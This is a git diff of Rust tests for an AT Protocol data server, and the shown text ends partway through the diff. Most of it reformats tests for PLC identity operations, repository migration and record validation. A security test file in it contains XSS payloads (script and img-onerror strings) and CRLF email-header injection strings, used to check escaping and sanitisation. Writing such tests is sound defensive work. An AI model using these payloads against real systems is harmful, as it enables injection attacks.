235
-
let signing_key = SigningKey::from_slice(&key_bytes)
236
-
.expect("Failed to create signing key");
237
-
let handle = get_user_handle(&did).await
247
+
let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key");
248
+
let handle = get_user_handle(&did)
249
+
.await
238
250
.expect("Failed to get user handle");
239
251
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
240
252
let pds_endpoint = format!("https://{}", hostname);
···
248
260
.await
249
261
.expect("Request failed");
250
262
assert_eq!(request_res.status(), StatusCode::OK);
251
-
let plc_token = get_plc_token_from_db(&did).await
263
+
let plc_token = get_plc_token_from_db(&did)
264
+
.await
252
265
.expect("PLC token not found in database");
253
266
let mock_plc = setup_mock_plc_for_sign(&did, &handle, &signing_key, &pds_endpoint).await;
254
267
unsafe {
···
292
305
}
293
306
294
307
#[tokio::test]
308
+
#[ignore = "requires exclusive env var access; run with: cargo test test_sign_plc_operation_with_custom_fields -- --ignored --test-threads=1"]
295
309
async fn test_sign_plc_operation_with_custom_fields() {
296
310
let client = client();
297
311
let (token, did) = create_account_and_login(&client).await;
298
-
let key_bytes = get_user_signing_key(&did).await
312
+
let key_bytes = get_user_signing_key(&did)
313
+
.await
299
314
.expect("Failed to get user signing key");
300
-
let signing_key = SigningKey::from_slice(&key_bytes)
301
-
.expect("Failed to create signing key");
302
-
let handle = get_user_handle(&did).await
315
+
let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key");
316
+
let handle = get_user_handle(&did)
317
+
.await
303
318
.expect("Failed to get user handle");
304
319
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
305
320
let pds_endpoint = format!("https://{}", hostname);
···
313
328
.await
314
329
.expect("Request failed");
315
330
assert_eq!(request_res.status(), StatusCode::OK);
316
-
let plc_token = get_plc_token_from_db(&did).await
331
+
let plc_token = get_plc_token_from_db(&did)
332
+
.await
317
333
.expect("PLC token not found in database");
318
334
let mock_plc = setup_mock_plc_for_sign(&did, &handle, &signing_key, &pds_endpoint).await;
319
335
unsafe {
···
348
364
assert!(also_known_as.is_some(), "Should have alsoKnownAs");
349
365
assert!(rotation_keys.is_some(), "Should have rotationKeys");
350
366
assert_eq!(also_known_as.unwrap().len(), 2, "Should have 2 aliases");
351
-
assert_eq!(rotation_keys.unwrap().len(), 2, "Should have 2 rotation keys");
367
+
assert_eq!(
368
+
rotation_keys.unwrap().len(),
369
+
2,
370
+
"Should have 2 rotation keys"
371
+
);
352
372
}
353
373
354
374
#[tokio::test]
···
356
376
async fn test_submit_plc_operation_success() {
357
377
let client = client();
358
378
let (token, did) = create_account_and_login(&client).await;
359
-
let key_bytes = get_user_signing_key(&did).await
379
+
let key_bytes = get_user_signing_key(&did)
380
+
.await
360
381
.expect("Failed to get user signing key");
361
-
let signing_key = SigningKey::from_slice(&key_bytes)
362
-
.expect("Failed to create signing key");
363
-
let handle = get_user_handle(&did).await
382
+
let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key");
383
+
let handle = get_user_handle(&did)
384
+
.await
364
385
.expect("Failed to get user handle");
365
386
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
366
387
let pds_endpoint = format!("https://{}", hostname);
···
409
430
async fn test_submit_plc_operation_wrong_endpoint_rejected() {
410
431
let client = client();
411
432
let (token, did) = create_account_and_login(&client).await;
412
-
let key_bytes = get_user_signing_key(&did).await
433
+
let key_bytes = get_user_signing_key(&did)
434
+
.await
413
435
.expect("Failed to get user signing key");
414
-
let signing_key = SigningKey::from_slice(&key_bytes)
415
-
.expect("Failed to create signing key");
416
-
let handle = get_user_handle(&did).await
436
+
let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key");
437
+
let handle = get_user_handle(&did)
438
+
.await
417
439
.expect("Failed to get user handle");
418
440
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
419
441
let pds_endpoint = format!("https://{}", hostname);
···
461
483
async fn test_submit_plc_operation_wrong_signing_key_rejected() {
462
484
let client = client();
463
485
let (token, did) = create_account_and_login(&client).await;
464
-
let key_bytes = get_user_signing_key(&did).await
486
+
let key_bytes = get_user_signing_key(&did)
487
+
.await
465
488
.expect("Failed to get user signing key");
466
-
let signing_key = SigningKey::from_slice(&key_bytes)
467
-
.expect("Failed to create signing key");
468
-
let handle = get_user_handle(&did).await
489
+
let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key");
490
+
let handle = get_user_handle(&did)
491
+
.await
469
492
.expect("Failed to get user handle");
470
493
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
471
494
let pds_endpoint = format!("https://{}", hostname);
···
515
538
async fn test_full_sign_and_submit_flow() {
516
539
let client = client();
517
540
let (token, did) = create_account_and_login(&client).await;
518
-
let key_bytes = get_user_signing_key(&did).await
541
+
let key_bytes = get_user_signing_key(&did)
542
+
.await
519
543
.expect("Failed to get user signing key");
520
-
let signing_key = SigningKey::from_slice(&key_bytes)
521
-
.expect("Failed to create signing key");
522
-
let handle = get_user_handle(&did).await
544
+
let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key");
545
+
let handle = get_user_handle(&did)
546
+
.await
523
547
.expect("Failed to get user handle");
524
548
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
525
549
let pds_endpoint = format!("https://{}", hostname);
···
533
557
.await
534
558
.expect("Request failed");
535
559
assert_eq!(request_res.status(), StatusCode::OK);
536
-
let plc_token = get_plc_token_from_db(&did).await
560
+
let plc_token = get_plc_token_from_db(&did)
561
+
.await
537
562
.expect("PLC token not found");
538
563
let mock_server = MockServer::start().await;
539
564
let did_encoded = urlencoding::encode(&did);
···
586
611
.expect("Sign failed");
587
612
assert_eq!(sign_res.status(), StatusCode::OK);
588
613
let sign_body: Value = sign_res.json().await.unwrap();
589
-
let signed_operation = sign_body.get("operation")
614
+
let signed_operation = sign_body
615
+
.get("operation")
590
616
.expect("Response should contain operation")
591
617
.clone();
592
618
assert!(signed_operation.get("sig").is_some());
···
612
638
}
613
639
614
640
#[tokio::test]
641
+
#[ignore = "requires exclusive env var access; run with: cargo test test_cross_pds_migration_with_records -- --ignored --test-threads=1"]
615
642
async fn test_cross_pds_migration_with_records() {
616
643
let client = client();
617
644
let (token, did) = create_account_and_login(&client).await;
618
-
let key_bytes = get_user_signing_key(&did).await
645
+
let key_bytes = get_user_signing_key(&did)
646
+
.await
619
647
.expect("Failed to get user signing key");
620
-
let signing_key = SigningKey::from_slice(&key_bytes)
621
-
.expect("Failed to create signing key");
622
-
let handle = get_user_handle(&did).await
648
+
let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key");
649
+
let handle = get_user_handle(&did)
650
+
.await
623
651
.expect("Failed to get user handle");
624
652
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
625
653
let pds_endpoint = format!("https://{}", hostname);
···
656
684
.expect("Export failed");
657
685
assert_eq!(export_res.status(), StatusCode::OK);
658
686
let car_bytes = export_res.bytes().await.unwrap();
659
-
assert!(car_bytes.len() > 100, "CAR file should have meaningful content");
687
+
assert!(
688
+
car_bytes.len() > 100,
689
+
"CAR file should have meaningful content"
690
+
);
660
691
let mock_server = MockServer::start().await;
661
692
let did_encoded = urlencoding::encode(&did);
662
693
let did_doc = create_did_document(&did, &handle, &signing_key, &pds_endpoint);
···
670
701
std::env::remove_var("SKIP_IMPORT_VERIFICATION");
671
702
}
672
703
let import_res = client
673
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
704
+
.post(format!(
705
+
"{}/xrpc/com.atproto.repo.importRepo",
706
+
base_url().await
707
+
))
674
708
.bearer_auth(&token)
675
709
.header("Content-Type", "application/vnd.ipld.car")
676
710
.body(car_bytes.to_vec())
···
705
739
);
706
740
let record_body: Value = get_record_res.json().await.unwrap();
707
741
assert_eq!(
708
-
record_body["value"]["text"],
709
-
"Test post before migration",
742
+
record_body["value"]["text"], "Test post before migration",
710
743
"Record content should match"
711
744
);
712
745
}
···
716
749
let client = client();
717
750
let (token, did) = create_account_and_login(&client).await;
718
751
let wrong_signing_key = SigningKey::random(&mut rand::thread_rng());
719
-
let handle = get_user_handle(&did).await
752
+
let handle = get_user_handle(&did)
753
+
.await
720
754
.expect("Failed to get user handle");
721
755
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
722
756
let pds_endpoint = format!("https://{}", hostname);
···
744
778
std::env::remove_var("SKIP_IMPORT_VERIFICATION");
745
779
}
746
780
let import_res = client
747
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
781
+
.post(format!(
782
+
"{}/xrpc/com.atproto.repo.importRepo",
783
+
base_url().await
784
+
))
748
785
.bearer_auth(&token)
749
786
.header("Content-Type", "application/vnd.ipld.car")
750
787
.body(car_bytes.to_vec())
···
763
800
import_body
764
801
);
765
802
assert!(
766
-
import_body["error"] == "InvalidSignature" ||
767
-
import_body["message"].as_str().unwrap_or("").contains("signature"),
803
+
import_body["error"] == "InvalidSignature"
804
+
|| import_body["message"]
805
+
.as_str()
806
+
.unwrap_or("")
807
+
.contains("signature"),
768
808
"Error should mention signature verification failure"
769
809
);
770
810
}
···
774
814
async fn test_full_migration_flow_end_to_end() {
775
815
let client = client();
776
816
let (token, did) = create_account_and_login(&client).await;
777
-
let key_bytes = get_user_signing_key(&did).await
817
+
let key_bytes = get_user_signing_key(&did)
818
+
.await
778
819
.expect("Failed to get user signing key");
779
-
let signing_key = SigningKey::from_slice(&key_bytes)
780
-
.expect("Failed to create signing key");
781
-
let handle = get_user_handle(&did).await
820
+
let signing_key = SigningKey::from_slice(&key_bytes).expect("Failed to create signing key");
821
+
let handle = get_user_handle(&did)
822
+
.await
782
823
.expect("Failed to get user handle");
783
824
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
784
825
let pds_endpoint = format!("https://{}", hostname);
···
815
856
.await
816
857
.expect("Request failed");
817
858
assert_eq!(request_res.status(), StatusCode::OK);
818
-
let plc_token = get_plc_token_from_db(&did).await
859
+
let plc_token = get_plc_token_from_db(&did)
860
+
.await
819
861
.expect("PLC token not found");
820
862
let mock_server = MockServer::start().await;
821
863
let did_encoded = urlencoding::encode(&did);
···
892
934
std::env::remove_var("SKIP_IMPORT_VERIFICATION");
893
935
}
894
936
let import_res = client
895
-
.post(format!("{}/xrpc/com.atproto.repo.importRepo", base_url().await))
937
+
.post(format!(
938
+
"{}/xrpc/com.atproto.repo.importRepo",
939
+
base_url().await
940
+
))
896
941
.bearer_auth(&token)
897
942
.header("Content-Type", "application/vnd.ipld.car")
898
943
.body(car_bytes.to_vec())
···
921
966
.expect("List failed");
922
967
assert_eq!(list_res.status(), StatusCode::OK);
923
968
let list_body: Value = list_res.json().await.unwrap();
924
-
let records = list_body["records"].as_array()
969
+
let records = list_body["records"]
970
+
.as_array()
925
971
.expect("Should have records array");
926
972
assert!(
927
973
records.len() >= 1,
+29
-15
tests/plc_operations.rs
+29
-15
tests/plc_operations.rs
···
219
219
.expect("Query failed");
220
220
assert!(row.is_some(), "PLC token should be created in database");
221
221
let row = row.unwrap();
222
-
assert!(row.token.len() == 11, "Token should be in format xxxxx-xxxxx");
222
+
assert!(
223
+
row.token.len() == 11,
224
+
"Token should be in format xxxxx-xxxxx"
225
+
);
223
226
assert!(row.token.contains('-'), "Token should contain hyphen");
224
-
assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired");
227
+
assert!(
228
+
row.expires_at > chrono::Utc::now(),
229
+
"Token should not be expired"
230
+
);
225
231
}
226
232
227
233
#[tokio::test]
···
294
300
async fn test_submit_plc_operation_wrong_verification_method() {
295
301
let client = client();
296
302
let (token, did) = create_account_and_login(&client).await;
297
-
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| {
298
-
format!("127.0.0.1:{}", app_port())
299
-
});
303
+
let hostname =
304
+
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
300
305
let handle = did.split(':').last().unwrap_or("user");
301
306
let res = client
302
307
.post(format!(
···
327
332
let body: serde_json::Value = res.json().await.unwrap();
328
333
assert_eq!(body["error"], "InvalidRequest");
329
334
assert!(
330
-
body["message"].as_str().unwrap_or("").contains("signing key") ||
331
-
body["message"].as_str().unwrap_or("").contains("rotation"),
335
+
body["message"]
336
+
.as_str()
337
+
.unwrap_or("")
338
+
.contains("signing key")
339
+
|| body["message"].as_str().unwrap_or("").contains("rotation"),
332
340
"Error should mention key mismatch: {:?}",
333
341
body
334
342
);
···
338
346
async fn test_submit_plc_operation_wrong_handle() {
339
347
let client = client();
340
348
let (token, _did) = create_account_and_login(&client).await;
341
-
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| {
342
-
format!("127.0.0.1:{}", app_port())
343
-
});
349
+
let hostname =
350
+
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
344
351
let res = client
345
352
.post(format!(
346
353
"{}/xrpc/com.atproto.identity.submitPlcOperation",
···
375
382
async fn test_submit_plc_operation_wrong_service_type() {
376
383
let client = client();
377
384
let (token, _did) = create_account_and_login(&client).await;
378
-
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| {
379
-
format!("127.0.0.1:{}", app_port())
380
-
});
385
+
let hostname =
386
+
std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
381
387
let res = client
382
388
.post(format!(
383
389
"{}/xrpc/com.atproto.identity.submitPlcOperation",
···
439
445
let now = chrono::Utc::now();
440
446
let expires = row.expires_at;
441
447
let diff = expires - now;
442
-
assert!(diff.num_minutes() >= 9, "Token should expire in ~10 minutes, got {} minutes", diff.num_minutes());
443
-
assert!(diff.num_minutes() <= 11, "Token should expire in ~10 minutes, got {} minutes", diff.num_minutes());
448
+
assert!(
449
+
diff.num_minutes() >= 9,
450
+
"Token should expire in ~10 minutes, got {} minutes",
451
+
diff.num_minutes()
452
+
);
453
+
assert!(
454
+
diff.num_minutes() <= 11,
455
+
"Token should expire in ~10 minutes, got {} minutes",
456
+
diff.num_minutes()
457
+
);
444
458
}
+28
-12
tests/plc_validation.rs
+28
-12
tests/plc_validation.rs
···
1
1
use bspds::plc::{
2
-
PlcError, PlcOperation, PlcService, PlcValidationContext,
3
-
cid_for_cbor, sign_operation, signing_key_to_did_key,
4
-
validate_plc_operation, validate_plc_operation_for_submission,
2
+
PlcError, PlcOperation, PlcService, PlcValidationContext, cid_for_cbor, sign_operation,
3
+
signing_key_to_did_key, validate_plc_operation, validate_plc_operation_for_submission,
5
4
verify_operation_signature,
6
5
};
7
6
use k256::ecdsa::SigningKey;
···
95
94
"sig": "test"
96
95
});
97
96
let result = validate_plc_operation(&op);
98
-
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")));
97
+
assert!(
98
+
matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods"))
99
+
);
99
100
}
100
101
101
102
#[test]
···
338
339
let cid1 = cid_for_cbor(&value).unwrap();
339
340
let cid2 = cid_for_cbor(&value).unwrap();
340
341
assert_eq!(cid1, cid2, "CID generation should be deterministic");
341
-
assert!(cid1.starts_with("bafyrei"), "CID should start with bafyrei (dag-cbor + sha256)");
342
+
assert!(
343
+
cid1.starts_with("bafyrei"),
344
+
"CID should start with bafyrei (dag-cbor + sha256)"
345
+
);
342
346
}
343
347
344
348
#[test]
···
354
358
fn test_signing_key_to_did_key_format() {
355
359
let key = SigningKey::random(&mut rand::thread_rng());
356
360
let did_key = signing_key_to_did_key(&key);
357
-
assert!(did_key.starts_with("did:key:z"), "Should start with did:key:z");
361
+
assert!(
362
+
did_key.starts_with("did:key:z"),
363
+
"Should start with did:key:z"
364
+
);
358
365
assert!(did_key.len() > 50, "Did key should be reasonably long");
359
366
}
360
367
···
364
371
let key2 = SigningKey::random(&mut rand::thread_rng());
365
372
let did1 = signing_key_to_did_key(&key1);
366
373
let did2 = signing_key_to_did_key(&key2);
367
-
assert_ne!(did1, did2, "Different keys should produce different did:keys");
374
+
assert_ne!(
375
+
did1, did2,
376
+
"Different keys should produce different did:keys"
377
+
);
368
378
}
369
379
370
380
#[test]
···
414
424
expected_pds_endpoint: "https://pds.example.com".to_string(),
415
425
};
416
426
let result = validate_plc_operation_for_submission(&op, &ctx);
417
-
assert!(result.is_ok(), "Tombstone should pass submission validation");
427
+
assert!(
428
+
result.is_ok(),
429
+
"Tombstone should pass submission validation"
430
+
);
418
431
}
419
432
420
433
#[test]
···
447
460
#[test]
448
461
fn test_plc_operation_struct() {
449
462
let mut services = HashMap::new();
450
-
services.insert("atproto_pds".to_string(), PlcService {
451
-
service_type: "AtprotoPersonalDataServer".to_string(),
452
-
endpoint: "https://pds.example.com".to_string(),
453
-
});
463
+
services.insert(
464
+
"atproto_pds".to_string(),
465
+
PlcService {
466
+
service_type: "AtprotoPersonalDataServer".to_string(),
467
+
endpoint: "https://pds.example.com".to_string(),
468
+
},
469
+
);
454
470
let mut verification_methods = HashMap::new();
455
471
verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string());
456
472
let op = PlcOperation {
-141
tests/proxy.rs
-141
tests/proxy.rs
···
1
-
mod common;
2
-
use axum::{Router, extract::Request, http::StatusCode, routing::any};
3
-
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
4
-
use reqwest::Client;
5
-
use std::sync::Arc;
6
-
use tokio::net::TcpListener;
7
-
8
-
async fn spawn_mock_upstream() -> (
9
-
String,
10
-
tokio::sync::mpsc::Receiver<(String, String, Option<String>)>,
11
-
) {
12
-
let (tx, rx) = tokio::sync::mpsc::channel(10);
13
-
let tx = Arc::new(tx);
14
-
let app = Router::new().fallback(any(move |req: Request| {
15
-
let tx = tx.clone();
16
-
async move {
17
-
let method = req.method().to_string();
18
-
let uri = req.uri().to_string();
19
-
let auth = req
20
-
.headers()
21
-
.get("Authorization")
22
-
.and_then(|h| h.to_str().ok())
23
-
.map(|s| s.to_string());
24
-
let _ = tx.send((method, uri, auth)).await;
25
-
(StatusCode::OK, "Mock Response")
26
-
}
27
-
}));
28
-
let listener = TcpListener::bind("127.0.0.1:0").await.unwrap();
29
-
let addr = listener.local_addr().unwrap();
30
-
tokio::spawn(async move {
31
-
axum::serve(listener, app).await.unwrap();
32
-
});
33
-
(format!("http://{}", addr), rx)
34
-
}
35
-
36
-
#[tokio::test]
37
-
async fn test_proxy_via_header() {
38
-
let app_url = common::base_url().await;
39
-
let (upstream_url, mut rx) = spawn_mock_upstream().await;
40
-
let client = Client::new();
41
-
let res = client
42
-
.get(format!("{}/xrpc/com.example.test", app_url))
43
-
.header("atproto-proxy", &upstream_url)
44
-
.header("Authorization", "Bearer test-token")
45
-
.send()
46
-
.await
47
-
.unwrap();
48
-
assert_eq!(res.status(), StatusCode::OK);
49
-
let (method, uri, auth) = rx.recv().await.expect("Upstream should receive request");
50
-
assert_eq!(method, "GET");
51
-
assert_eq!(uri, "/xrpc/com.example.test");
52
-
assert_eq!(auth, Some("Bearer test-token".to_string()));
53
-
}
54
-
55
-
#[tokio::test]
56
-
async fn test_proxy_auth_signing() {
57
-
let app_url = common::base_url().await;
58
-
let (upstream_url, mut rx) = spawn_mock_upstream().await;
59
-
let client = Client::new();
60
-
let (access_jwt, did) = common::create_account_and_login(&client).await;
61
-
let res = client
62
-
.get(format!("{}/xrpc/com.example.signed", app_url))
63
-
.header("atproto-proxy", &upstream_url)
64
-
.header("Authorization", format!("Bearer {}", access_jwt))
65
-
.send()
66
-
.await
67
-
.unwrap();
68
-
assert_eq!(res.status(), StatusCode::OK);
69
-
let (method, uri, auth) = rx.recv().await.expect("Upstream receive");
70
-
assert_eq!(method, "GET");
71
-
assert_eq!(uri, "/xrpc/com.example.signed");
72
-
let received_token = auth.expect("No auth header").replace("Bearer ", "");
73
-
assert_ne!(received_token, access_jwt, "Token should be replaced");
74
-
let parts: Vec<&str> = received_token.split('.').collect();
75
-
assert_eq!(parts.len(), 3);
76
-
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).expect("payload b64");
77
-
let claims: serde_json::Value = serde_json::from_slice(&payload_bytes).expect("payload json");
78
-
assert_eq!(claims["iss"], did);
79
-
assert_eq!(claims["sub"], did);
80
-
assert_eq!(claims["aud"], upstream_url);
81
-
assert_eq!(claims["lxm"], "com.example.signed");
82
-
}
83
-
84
-
#[tokio::test]
85
-
async fn test_proxy_post_with_body() {
86
-
let app_url = common::base_url().await;
87
-
let (upstream_url, mut rx) = spawn_mock_upstream().await;
88
-
let client = Client::new();
89
-
let payload = serde_json::json!({
90
-
"text": "Hello from proxy test",
91
-
"createdAt": "2024-01-01T00:00:00Z"
92
-
});
93
-
let res = client
94
-
.post(format!("{}/xrpc/com.example.postMethod", app_url))
95
-
.header("atproto-proxy", &upstream_url)
96
-
.header("Authorization", "Bearer test-token")
97
-
.json(&payload)
98
-
.send()
99
-
.await
100
-
.unwrap();
101
-
assert_eq!(res.status(), StatusCode::OK);
102
-
let (method, uri, auth) = rx.recv().await.expect("Upstream should receive request");
103
-
assert_eq!(method, "POST");
104
-
assert_eq!(uri, "/xrpc/com.example.postMethod");
105
-
assert_eq!(auth, Some("Bearer test-token".to_string()));
106
-
}
107
-
108
-
#[tokio::test]
109
-
async fn test_proxy_with_query_params() {
110
-
let app_url = common::base_url().await;
111
-
let (upstream_url, mut rx) = spawn_mock_upstream().await;
112
-
let client = Client::new();
113
-
let res = client
114
-
.get(format!(
115
-
"{}/xrpc/com.example.query?repo=did:plc:test&collection=app.bsky.feed.post&limit=50",
116
-
app_url
117
-
))
118
-
.header("atproto-proxy", &upstream_url)
119
-
.header("Authorization", "Bearer test-token")
120
-
.send()
121
-
.await
122
-
.unwrap();
123
-
assert_eq!(res.status(), StatusCode::OK);
124
-
let (method, uri, _auth) = rx.recv().await.expect("Upstream should receive request");
125
-
assert_eq!(method, "GET");
126
-
assert!(
127
-
uri.contains("repo=did") || uri.contains("repo=did%3Aplc%3Atest"),
128
-
"URI should contain repo param, got: {}",
129
-
uri
130
-
);
131
-
assert!(
132
-
uri.contains("collection=app.bsky.feed.post") || uri.contains("collection=app.bsky"),
133
-
"URI should contain collection param, got: {}",
134
-
uri
135
-
);
136
-
assert!(
137
-
uri.contains("limit=50"),
138
-
"URI should contain limit param, got: {}",
139
-
uri
140
-
);
141
-
}
+1
-4
tests/rate_limit.rs
+1
-4
tests/rate_limit.rs
···
85
85
#[ignore = "rate limiting is disabled in test environment"]
86
86
async fn test_account_creation_rate_limiting() {
87
87
let client = client();
88
-
let url = format!(
89
-
"{}/xrpc/com.atproto.server.createAccount",
90
-
base_url().await
91
-
);
88
+
let url = format!("{}/xrpc/com.atproto.server.createAccount", base_url().await);
92
89
let mut rate_limited_count = 0;
93
90
let mut other_count = 0;
94
91
for i in 0..15 {
+27
-9
tests/record_validation.rs
+27
-9
tests/record_validation.rs
···
1
-
use bspds::validation::{RecordValidator, ValidationError, ValidationStatus, validate_record_key, validate_collection_nsid};
1
+
use bspds::validation::{
2
+
RecordValidator, ValidationError, ValidationStatus, validate_collection_nsid,
3
+
validate_record_key,
4
+
};
2
5
use serde_json::json;
3
6
4
7
fn now() -> String {
···
128
131
"tags": [long_tag]
129
132
});
130
133
let result = validator.validate(&post, "app.bsky.feed.post");
131
-
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")));
134
+
assert!(
135
+
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/"))
136
+
);
132
137
}
133
138
134
139
#[test]
···
162
167
"displayName": long_name
163
168
});
164
169
let result = validator.validate(&profile, "app.bsky.actor.profile");
165
-
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
170
+
assert!(
171
+
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")
172
+
);
166
173
}
167
174
168
175
#[test]
···
174
181
"description": long_desc
175
182
});
176
183
let result = validator.validate(&profile, "app.bsky.actor.profile");
177
-
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description"));
184
+
assert!(
185
+
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description")
186
+
);
178
187
}
179
188
180
189
#[test]
···
229
238
"createdAt": now()
230
239
});
231
240
let result = validator.validate(&like, "app.bsky.feed.like");
232
-
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")));
241
+
assert!(
242
+
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri"))
243
+
);
233
244
}
234
245
235
246
#[test]
···
381
392
"createdAt": now()
382
393
});
383
394
let result = validator.validate(&generator, "app.bsky.feed.generator");
384
-
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
395
+
assert!(
396
+
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")
397
+
);
385
398
}
386
399
387
400
#[test]
···
415
428
"createdAt": now()
416
429
});
417
430
let result = validator.validate(&record, "app.bsky.feed.post");
418
-
assert!(matches!(result, Err(ValidationError::TypeMismatch { expected, actual })
419
-
if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like"));
431
+
assert!(
432
+
matches!(result, Err(ValidationError::TypeMismatch { expected, actual })
433
+
if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like")
434
+
);
420
435
}
421
436
422
437
#[test]
···
470
485
"createdAt": "2024/01/15"
471
486
});
472
487
let result = validator.validate(&post, "app.bsky.feed.post");
473
-
assert!(matches!(result, Err(ValidationError::InvalidDatetime { .. })));
488
+
assert!(matches!(
489
+
result,
490
+
Err(ValidationError::InvalidDatetime { .. })
491
+
));
474
492
}
475
493
476
494
#[test]
+1
-1
tests/repo_batch.rs
+1
-1
tests/repo_batch.rs
+185
-45
tests/security_fixes.rs
+185
-45
tests/security_fixes.rs
···
1
1
mod common;
2
-
use bspds::notifications::{
3
-
SendError, is_valid_phone_number, sanitize_header_value,
4
-
};
5
-
use bspds::oauth::templates::{login_page, error_page, success_page};
6
-
use bspds::image::{ImageProcessor, ImageError};
2
+
use bspds::image::{ImageError, ImageProcessor};
3
+
use bspds::notifications::{SendError, is_valid_phone_number, sanitize_header_value};
4
+
use bspds::oauth::templates::{error_page, login_page, success_page};
7
5
8
6
#[test]
9
7
fn test_sanitize_header_value_removes_crlf() {
···
11
9
let sanitized = sanitize_header_value(malicious);
12
10
assert!(!sanitized.contains('\r'), "CR should be removed");
13
11
assert!(!sanitized.contains('\n'), "LF should be removed");
14
-
assert!(sanitized.contains("Injected"), "Original content should be preserved");
15
-
assert!(sanitized.contains("Bcc:"), "Text after newline should be on same line (no header injection)");
12
+
assert!(
13
+
sanitized.contains("Injected"),
14
+
"Original content should be preserved"
15
+
);
16
+
assert!(
17
+
sanitized.contains("Bcc:"),
18
+
"Text after newline should be on same line (no header injection)"
19
+
);
16
20
}
17
21
18
22
#[test]
···
35
39
let sanitized = sanitize_header_value(input);
36
40
assert!(!sanitized.contains('\r'), "CR should be removed");
37
41
assert!(!sanitized.contains('\n'), "LF should be removed");
38
-
assert!(sanitized.contains("Line1"), "Content before newlines preserved");
39
-
assert!(sanitized.contains("Line4"), "Content after newlines preserved");
42
+
assert!(
43
+
sanitized.contains("Line1"),
44
+
"Content before newlines preserved"
45
+
);
46
+
assert!(
47
+
sanitized.contains("Line4"),
48
+
"Content after newlines preserved"
49
+
);
40
50
}
41
51
42
52
#[test]
···
45
55
let sanitized = sanitize_header_value(header_injection);
46
56
let lines: Vec<&str> = sanitized.split("\r\n").collect();
47
57
assert_eq!(lines.len(), 1, "Should be a single line after sanitization");
48
-
assert!(sanitized.contains("Normal Subject"), "Original content preserved");
49
-
assert!(sanitized.contains("Bcc:"), "Content after CRLF preserved as same line text");
50
-
assert!(sanitized.contains("X-Injected:"), "All content on same line");
58
+
assert!(
59
+
sanitized.contains("Normal Subject"),
60
+
"Original content preserved"
61
+
);
62
+
assert!(
63
+
sanitized.contains("Bcc:"),
64
+
"Content after CRLF preserved as same line text"
65
+
);
66
+
assert!(
67
+
sanitized.contains("X-Injected:"),
68
+
"All content on same line"
69
+
);
51
70
}
52
71
53
72
#[test]
···
114
133
"+123--help",
115
134
];
116
135
for input in malicious_inputs {
117
-
assert!(!is_valid_phone_number(input), "Malicious input '{}' should be rejected", input);
136
+
assert!(
137
+
!is_valid_phone_number(input),
138
+
"Malicious input '{}' should be rejected",
139
+
input
140
+
);
118
141
}
119
142
}
120
143
···
148
171
let malicious_client_id = "<script>alert('xss')</script>";
149
172
let html = login_page(malicious_client_id, None, None, "test-uri", None, None);
150
173
assert!(!html.contains("<script>"), "Script tags should be escaped");
151
-
assert!(html.contains("<script>"), "HTML entities should be used for escaping");
174
+
assert!(
175
+
html.contains("<script>"),
176
+
"HTML entities should be used for escaping"
177
+
);
152
178
}
153
179
154
180
#[test]
155
181
fn test_oauth_template_xss_escaping_client_name() {
156
182
let malicious_client_name = "<img src=x onerror=alert('xss')>";
157
-
let html = login_page("client123", Some(malicious_client_name), None, "test-uri", None, None);
183
+
let html = login_page(
184
+
"client123",
185
+
Some(malicious_client_name),
186
+
None,
187
+
"test-uri",
188
+
None,
189
+
None,
190
+
);
158
191
assert!(!html.contains("<img "), "IMG tags should be escaped");
159
-
assert!(html.contains("<img"), "IMG tag should be escaped as HTML entity");
192
+
assert!(
193
+
html.contains("<img"),
194
+
"IMG tag should be escaped as HTML entity"
195
+
);
160
196
}
161
197
162
198
#[test]
163
199
